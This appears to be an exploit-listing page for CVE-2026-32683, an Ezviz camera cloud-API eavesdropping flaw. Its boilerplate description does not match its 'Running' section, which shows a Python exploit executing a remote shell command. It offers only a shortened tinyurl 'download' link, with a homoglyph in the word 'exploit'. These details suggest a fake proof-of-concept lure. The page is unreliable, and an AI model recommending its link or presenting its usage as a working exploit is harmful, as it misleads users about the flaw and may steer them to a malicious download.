Share
## https://sploitus.com/exploit?id=1F65313B-45C8-596B-8E0D-CD104DF1537D
# CVE-2026-32683

## Overview
CVE-2026-32683 is a vulnerability affecting certain Ezviz products, which are designed for video surveillance and security. These products utilize older cloud feature modules that employ legacy API interfaces, creating a risk associated with data transmission. The vulnerability allows potential attackers to eavesdrop on network requests, which could enable them to capture sensitive data being transmitted between the devices and the cloud. This exposure not only compromises user privacy but also puts organizations at risk of data breaches, potentially leading to misuse of sensitive information.

## Details
- **CVE ID**: [CVE-2026-32683](https://nvd.nist.gov/vuln/detail/CVE-2026-32683)
- **Discovered**: 2026-05-09
- **Published**: 2026-05-09

## Vulnerability Description
To mitigate this vulnerability, users are advised to upgrade their applications to the latest versions and enable video encryption features, which are critical for safeguarding data in transit. The implications of this vulnerability could be particularly detrimental to businesses relying on these products for security, as the unauthorized access to video feeds and related data could lead to financial and reputational damage.
## Running

To run explоit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

### [Download here](https://tinyurl.com/5c9uh48h)